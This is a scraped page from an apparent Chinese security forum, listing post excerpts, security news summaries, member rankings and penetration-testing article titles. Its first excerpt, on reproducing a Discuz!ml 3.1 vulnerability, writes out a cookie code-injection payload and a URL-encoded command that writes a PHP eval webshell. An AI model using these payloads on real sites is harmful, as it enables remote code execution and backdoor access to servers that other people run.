复现Discuz!ml3.1海外版漏洞遇到的问题

抓包找到cookie的language的值修改为xxxx_xxxx_language=sc\'.phpinfo().\',成功执行了phpinfo在getshell的时候发现根目录无法写入payload:%27.%2Bfile_put_contents%28%27shell.php%27%2Curldecode%28%27%253C%253Fphp%2520eval%2528%2524_POST%255B%25221%2522%255D%2529%253B%253F%253E%27%29%29.%27执行sc\'.system(ls).\'; 发现根目录没有写入文件,即使写入随便其他内容也是写入不了,尝试写入其他目录,但是因为目录中有斜杠 ...

微软警告 GALLIUM 黑客组织瞄准全球电信供应商

GALLIUM 的行为表现活跃,尤其是2018年至2019年间格外明显。而攻击者一旦破坏了目标网络,他们将会使用常见的科技手段如Mimikatz来窃取可用的凭证。专家指出,目前GALLIUM 正在使用一些版本常见的软件以及公开化的一些工具,这工具只需稍作改动,就可以逃避检测。运营商利用低成本和易于替换的基础设施,使用动态DNS域和定 ...

2019-12-14 13:54:12 0 73

VISA警告针对加油站PoS系统的持续性网络攻击

根据VISA发布的安全警报,北美汽油供应商的POS系统正日益受到网络犯罪集团协调的攻击的威胁。根据Visa Payment Fraud Disruption(PFD)的数据,在2019年夏季,发现了三起针对组织的此类攻击,其最终目的是窃取支付卡数据。该警报是继11月发出的警告之后的又一警告,该警告还提到,这些商家成为目标其原因在于“他们缺乏安 ...

2019-12-14 01:15:52 0 84

Elasticsearch27亿数据泄露 10亿明文波及中国大厂

研究人员称,过去一年里,一些企业无意识得让他们的Amazon Web服务S3和基于云计算的ElasticSearch存储桶暴露出来。它们没有任何适当的安全措施,也没有被试图锁定的迹象。SecurityDiscovery网站的网络威胁情报总监鲍勃·迪亚琴科(Bob Diachenko)称,我们在上周发现了一个巨大的ElasticSearch数据库,包含超过27亿个电邮地 ...

2019-12-13 14:31:08 5 239

非法侵权采集:500多个影视网站被关停

因非法侵权采集 电影电视剧“91资源”团伙被警方捣毁,关停侵权影视网站 500 余个,抓捕涉案人员 18 名。了解到,“91资源”运营的三个电影站影片资源非常丰富,采集的电影电视剧高达10万余部,他们利用插件批量采集工具将大量刚上映电影电视剧等视频资源采集到自己的电影网站上,供用户免费观看,然后借助QQ群和其他平台进 ...

2019-12-13 09:31:08 0 288

安全研究人员发现亚马逊上销售的儿童智能手表存在严重安全漏洞

安全公司Rapid7披露了在亚马逊上出售的三款儿童智能手表存在安全漏洞,这三款儿童智能手表是Duiwoim,Jsbaby和Smarturtle,价格不到40美元。它们被用作跟踪设备,以跟踪孩子并允许父母向孩子发送消息或者打电话。  但是Rapid7的安全研究人员发现,与佩戴手表的孩子保持联系的不仅仅是父母,因为它们内建的过滤器本来只允 ...

2019-12-13 08:13:57 5 126

智能汽车如何应对信息安全新挑战

从1886年诞生至今,汽车已有130多年的历史。诞生之初,汽车只是被当作方便出行的交通工具,让人没想到的是如今它却和IT技术有如此紧密的结合,成为万物互联版图中的一员。近几年,汽车被远程攻击的事件层出不穷,车联网的安全形势日益严峻。车越智能化威胁点就越多“万物均可互联,一切皆可编程”。如今,物理世界和虚拟世 ...

2019-12-12 10:52:03 1 137

热门活动

T00ls专家

Twi1ight

荣誉会员

文章34篇,精华11篇

1

zcgonvh

荣誉会员

文章25篇,精华11篇

2

Rices

荣誉会员

文章152篇,精华5篇

3

Bypass

荣誉会员

文章23篇,精华5篇

4

Hmily

新手上路

文章18篇,精华4篇

5

xflxfl

注册会员

文章13篇,精华3篇

6

ph12h0n

荣誉会员

文章38篇,精华3篇

7

backlion

注册会员

文章29篇,精华3篇

8

alibaba

注册会员

文章22篇,精华2篇

9

yboy

新手上路

文章48篇,精华2篇

10

最新精华

渗透测试Web中间件常见漏洞总结

# IISIIS是Internet Information Services的缩写,意为互联网信 ...

2019-06-29 15:46:03 90 2714

渗透测试一篇了解PHP代码审计基础

项目地址是https://github.com/aleenzz/php_bug_wiki 基础部分应 ...

2019-06-19 10:41:13 52 1663

渗透测试一篇文章了解MSSQL之注入指北

这个教程主要讲到mssql的注入、提权、bypass的一些方法,其中很 ...

2019-05-12 00:44:41 31 1514

渗透测试【开源】HTTPDecrypt for Android Penetration Test

# HTTP Decrypt利用HTTP协议 远程加解密数据包,实现Burp一条龙 ...

2019-05-06 15:06:22 50 10621

【僵尸复活】【已通过】https的app如何抓包

来土司这么久了,到现在还是新兵入营,有点丢人。前面看到几位基友在问app是https协议的如何抓包,在这我就讲一下自己抓包的三钟方法。[b]一、将burp的证书导入到手机中[/b]在浏览器中访问burp设置的代理地址点击CA certificate下载burpsuite的证书,保存证书文件进入Firefox的设置里面,选择高级,然后选择证书机构,导入刚才下载的证书导入成功后发现证书机构中多出ProtSwigger点击导出 ...

付费通(shfft.com)某分站命令执行漏洞,可getshell

根据《中华人民共和国网络安全法》,本站漏洞永不公开,若厂商想了解详情请咨询admin@t00ls.net!

Top ↑